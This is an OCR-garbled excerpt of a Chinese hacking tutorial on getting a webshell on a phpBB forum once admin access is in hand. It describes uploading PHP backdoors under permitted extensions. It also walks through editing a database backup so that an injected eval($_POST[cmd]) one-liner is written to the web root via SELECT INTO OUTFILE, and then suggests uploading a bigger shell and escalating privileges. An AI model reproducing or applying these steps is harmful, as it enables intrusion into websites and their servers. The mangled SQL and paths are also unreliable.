如发现有乱码， 请直接从这里浏览原文
正文摘录:

PHP的后门得到Webshell。可是，最新版本的PHPBB后台已经不允许添加上传类型了。如图5。图5可以利用的基本上都限制了。经测试发现部分空间可以添加inc扩展名，然后前台发帖上传扩展为inc的PHP后门程序也可以成功解释执行。不过这个方法局限性太大，但有部分论坛确实是可以成功的!’添加jnc扩展名的操作也比较简单。在后台找到“扩展名”一“扩展名控制”，然后在“扩展名。里填入inc，图6然后在前台发帖或编辑帖子来上传附件，上传扩展名为inc的PHP后门.再在预览里找到webshe儿的访问路径即可得到Webshell(在预览里直接点击附件名即可打开Webshell)。当然了，要是空间支持其它脚本，大可以添加上传jsp后门哦。如果要添加asp后门也是有办法的，虽然。禁止扩展名”里禁止了上传asp。但是我们可以先把禁止了的asp删除掉，然后再参照添加inc扩展名的方法添加即可。除了这个方法可以拿到websheU外，还有一个稍为复杂点的方法。这个方法同样局限性也很大，因为要求论坛要使用具有r00t权限的MySQL用户名和密码才可以成功!具体操作步骤如下(以本机架设的测试论坛举例说明)：l、先使用管理员用户名和密码登录后台。2、在浏览器中访问http：／／127.0.0.L／adn2in／admindisallow.php?setmodules：00(会看到空白页面)-3、在后台找到“总体管理”“备份数据库”，执行备份数据库操作(备份完毕会自动弹出下载窗口，下载保存本地即可'-4、复制备份文件另存一份(用于导出webshell后恢复论坛)，使用记事本打开下载回来的数据库文件phpbb—db一’backup.sql，查找关键字INSERTINTOphpbb—categories(cat—id。cattitle，cat—order)VALUES，一共有两处!INSERTINT0phpbb—categorlea(cat—id。c-t—titie，cst—order)VALUES后面的内容会根据情况而有所不同。比如我这里是INSERTINTOphpbb—categories(cat—id，cat一‘title.cat—order’)VAL.UES(’1’。’嗣试分区’.’10’)lI5、把INSERTINTOphpbb—categories(cat—jd，cat—title，cat～order)VALUES(’1’.’测试分区’，’10’)l改为INSERTINTOphpbb—categorits(c·t—id，CSt—titie，cat—ordcr)VAL.UES(’1’。‘＜?phpevsl(S—POST【cmd】)I?＞’.’10‘)ISELECTcat—title-NTOOUTFll。E’D.-＼＼Progr-mFiles{lVertrigoSerrt{WWW{Ishell.php‘FROMphpbb—cctagorleawhercat—idall，保存即可。简单的解释一下，“D：＼＼ProgramFiles＼＼Vm。trigoServ＼＼WWW＼＼sheH.php”是导出webshe【J的绝对路径(即为我本机的论坛安装目录)，这个方法是利用数据库操作实现的，先往一个已存在的表段里插人PHP一句话后门，然后再使用“SELEcT表段名INToOUTFILE”导出到论坛目录，从而得到webshell(要注意的是里面的绝对路径一定要把＼替换成＼＼，否则不可以成功，而·nix类系统使用／连结路径)，6、在后台找到“总体管理”。恢复数据库”。浏览选中刚才改好的备份文件phpbb。dbbackup.sql，然后点击“开始恢复”，恢复完毕后一般会看到一些错误，不必理会，过会儿会恢复就是了；7、使用一句话客户端连接http：／／127.O.0，l／shell.php，得到简易的Webshell，如图7l8.参照第6步，使用未修改过的phpbb—db—backup.sql恢复论坛数据(要是不恢复，论坛会出错)!至此就顺利得到了Webshell，就是操作上有点繁琐。接下来怎么玩就是你自己的事了，嘿嘿……喜欢的话就上传大马什么的，然后提权……由于我本机架设的PHP环境